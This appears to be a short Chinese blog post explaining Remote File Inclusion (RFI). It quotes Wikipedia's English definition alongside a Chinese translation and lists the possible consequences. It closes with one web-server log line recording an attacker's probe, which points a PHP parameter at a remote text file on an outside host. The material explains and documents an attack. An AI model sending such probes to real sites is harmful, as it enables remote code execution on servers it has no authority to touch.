来源:http://en.wikipedia.org/wiki/Remote_File_Inclusion
有一部分翻译的可能不准确,只是为了大致的说明一下什么是RFI

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
远程文件包含(RFI)是一种网站上最常见的漏洞,它允许攻击者包含(加载)一个远程文件,通常这个远程文件是位于某个网站服务器上的脚本文件。这个漏洞可能在传入用户输入的参数时没有进行严格验证时发生。它可以导致一些问题,轻微点的输出文件内容,严重的话,他也能导致这些:

·Code execution on the web server
在服务器上执行任意脚本
·Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS). 
用户端的代码执行,可能导致其他攻击例如跨站脚本(xss)
·Denial of Service (DoS)
拒绝服务(DoS)
·Data Theft/Manipulation
数据窃取或篡改
 

------------------------------------------

攻击者有时候会这么刺探可能存在漏洞的页面(当然我这网站没php页面,给他折腾吧):

2010-02-18 21:44:50 - GET /list/setup.php?board_skin_path=http://dongja.booktobi.com//attic/id1.txt???? 74.205.120.218 www.sacour.cn 200 4901 188